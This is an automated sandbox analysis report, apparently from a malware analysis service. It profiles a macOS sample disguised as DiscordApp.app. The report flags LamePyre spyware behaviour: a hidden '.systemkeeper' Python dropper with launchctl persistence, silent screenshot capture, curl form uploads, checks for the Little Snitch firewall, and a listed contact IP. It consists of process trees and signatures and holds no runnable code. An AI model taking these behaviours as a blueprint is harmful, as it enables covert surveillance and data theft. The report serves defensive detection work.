Source: /bin/sh (PID: 574)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 577)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 600)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 617)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 633)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 642)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 650)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 658)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 674)Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 65585 Sample: Pe7niErK6B Startdate: 12/12/2018 Architecture: MAC Score: 76 72 37.1.221.204, 80, 8080 LEASEWEB-DE Ukraine 2->72 74 17.253.57.212, 49242, 80 APPLE-AUSTIN-AppleIncUS United States 2->74 10 xpcproxy Application Stub 2->10         started        12 xpcproxy .systemkeeper Python 2->12         started        14 xpcproxy .systemkeeper Python 2->14         started        16 12 other processes 2->16 signatures3 88 Detected TCP or UDP traffic on non-standard ports 72->88 process4 process5 18 bash 10->18         started        20 Python sh 12->20         started        22 Python sh 14->22         started        24 Python sh 16->24         started        26 Python sh 16->26         started        28 Python sh 16->28         started        30 8 other processes 16->30 process6 32 bash python Python 3 18->32         started        38 41 other processes 18->38 36 sh grep 20->36         started        40 2 other processes 20->40 42 3 other processes 22->42 44 3 other processes 24->44 46 3 other processes 26->46 48 3 other processes 28->48 50 21 other processes 30->50 file7 68 /Users/henry/Libra....systemkeeper.plist, XML 32->68 dropped 70 /Users/henry/.system/.systemkeeper, python 32->70 dropped 76 Detected macOS LamePyre spyware 32->76 52 Python sh 32->52         started        54 Python sh mkdir 32->54         started        57 Python sh mkdir 32->57         started        59 Python sh launchctl 32->59         started        78 Checks if the firewall "Little Snitch" is running 36->78 80 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 36->80 82 Uploads files by using the "curl" command and emulating a filled-in form 38->82 84 Explicitly creates screenshots silently (i.e. without playing sounds) 38->84 86 Captures screenshots with shell command 'screencapture' 38->86 signatures8 process9 signatures10 61 sh ps 52->61         started        64 sh grep 52->64         started        66 sh grep 52->66         started        90 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 54->90 process11 signatures12 92 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 61->92 94 Reads process information of other processes 61->94 96 Checks if the firewall "Little Snitch" is running 64->96

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

cam-macmac-stand

Startup

  • system is mac1
  • xpcproxy (PID: 561 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • Application Stub (PID: 561 PPID: 1 Overlayed Process Image: xpcproxy MD5: 9c5867b717c3b80c525f4038ff075186)
    • bash (PID: 563 PPID: 561 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 564 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 565 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • base64 (PID: 565 PPID: 563 Overlayed Process Image: bash MD5: 718fe34e4012999c180f807fe323e7f1)
      • bash (PID: 566 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • python (PID: 566 PPID: 563 Overlayed Process Image: bash MD5: 2464fd41f7cf319d0e5c61a7643af77e)
      • Python (PID: 566 PPID: 563 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
        • Python (PID: 572 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 572 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
        • mkdir (PID: 572 PPID: 566 Overlayed Process Image: sh MD5: 135a3b94b3d9efccb4c8cd23ac404571)
        • Python (PID: 573 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 573 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
        • mkdir (PID: 573 PPID: 566 Overlayed Process Image: sh MD5: 135a3b94b3d9efccb4c8cd23ac404571)
        • Python (PID: 574 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 574 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
        • launchctl (PID: 574 PPID: 566 Overlayed Process Image: sh MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
        • Python (PID: 576 PPID: 566 MD5: ba780ab677147d9db60c564ef3f51dd0)
        • sh (PID: 576 PPID: 566 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
          • sh (PID: 578 PPID: 576 MD5: 8aa60b22a5d30418a002b340989384dc)
          • ps (PID: 578 PPID: 576 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
          • sh (PID: 580 PPID: 576 MD5: 8aa60b22a5d30418a002b340989384dc)
          • grep (PID: 580 PPID: 576 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
          • sh (PID: 581 PPID: 576 MD5: 8aa60b22a5d30418a002b340989384dc)
          • grep (PID: 581 PPID: 576 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • bash (PID: 567 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 584 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 584 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 586 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 586 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 587 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 587 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 588 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 588 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 594 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 594 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 595 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 595 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 599 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 599 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 604 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 604 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 605 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 605 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 606 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 606 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 612 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 612 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 613 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 613 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 614 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 614 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 615 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 615 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 621 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 621 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 622 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 622 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 628 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 628 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 629 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 629 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 630 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 630 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 631 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 631 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 637 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 637 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 638 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 638 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 639 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 639 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 640 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 640 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 646 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 646 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 647 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 647 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 649 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 649 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 654 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 654 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 655 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 655 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 656 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 656 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 662 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 662 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 663 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 663 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 664 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 664 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 665 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 665 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 671 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 671 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 672 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 672 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
      • bash (PID: 678 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • screencapture (PID: 678 PPID: 563 Overlayed Process Image: bash MD5: e35ea92c730c1c3a66fc3a14027729aa)
      • bash (PID: 679 PPID: 563 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • curl (PID: 679 PPID: 563 Overlayed Process Image: bash MD5: 078cd73f58d3d8f875eed22522ff73f7)
  • bash (PID: 568 PPID: 567 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
  • system_profiler (PID: 568 PPID: 567 Overlayed Process Image: bash MD5: 28bae8e36d2b8a65b50a54ee327298b8)
  • bash (PID: 569 PPID: 567 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
  • awk (PID: 569 PPID: 567 Overlayed Process Image: bash MD5: fa9db7f6c4a0287ceb78a3bd34524ada)
  • xpcproxy (PID: 575 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 575 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 575 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 577 PPID: 575 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 577 PPID: 575 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 579 PPID: 577 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 579 PPID: 577 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 582 PPID: 577 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 582 PPID: 577 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 583 PPID: 577 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 583 PPID: 577 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 589 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 589 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 589 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 590 PPID: 589 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 590 PPID: 589 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 591 PPID: 590 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 591 PPID: 590 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 592 PPID: 590 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 592 PPID: 590 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 593 PPID: 590 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 593 PPID: 590 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 598 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 598 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 598 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 600 PPID: 598 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 600 PPID: 598 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 601 PPID: 600 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 601 PPID: 600 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 602 PPID: 600 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 602 PPID: 600 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 603 PPID: 600 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 603 PPID: 600 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 607 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 607 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 607 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 608 PPID: 607 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 608 PPID: 607 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 609 PPID: 608 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 609 PPID: 608 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 610 PPID: 608 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 610 PPID: 608 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 611 PPID: 608 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 611 PPID: 608 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 616 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 616 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 616 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 617 PPID: 616 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 617 PPID: 616 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 618 PPID: 617 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 618 PPID: 617 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 619 PPID: 617 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 619 PPID: 617 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 620 PPID: 617 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 620 PPID: 617 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 623 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 623 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 623 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 624 PPID: 623 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 624 PPID: 623 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 625 PPID: 624 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 625 PPID: 624 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 626 PPID: 624 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 626 PPID: 624 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 627 PPID: 624 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 627 PPID: 624 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 632 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 632 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 632 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 633 PPID: 632 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 633 PPID: 632 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 634 PPID: 633 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 634 PPID: 633 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 635 PPID: 633 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 635 PPID: 633 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 636 PPID: 633 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 636 PPID: 633 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 641 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 641 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 641 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 642 PPID: 641 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 642 PPID: 641 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 643 PPID: 642 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 643 PPID: 642 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 644 PPID: 642 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 644 PPID: 642 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 645 PPID: 642 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 645 PPID: 642 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 648 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 648 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 648 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 650 PPID: 648 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 650 PPID: 648 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 651 PPID: 650 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 651 PPID: 650 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 652 PPID: 650 MD5: 8aa60b22a5d30418a002b340989384dc)
